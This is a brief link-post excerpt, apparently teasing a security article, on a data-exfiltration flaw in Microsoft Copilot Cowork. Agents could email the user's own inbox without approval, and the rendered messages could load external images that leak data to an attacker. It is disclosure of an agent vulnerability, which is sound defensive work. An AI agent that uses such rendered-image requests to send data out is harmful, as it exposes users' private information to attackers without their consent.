Microsoft Copilot Cowork Exfiltrates Files (opens in new tab)
The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data. In this case Microsoft Copilot Cowork (yes, that's ) was allowing agents to send emails to the user's own inbox without approval... but those messages were then rendered in a way that could leak data to an attacker via rendered images: Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a ...
Read the original article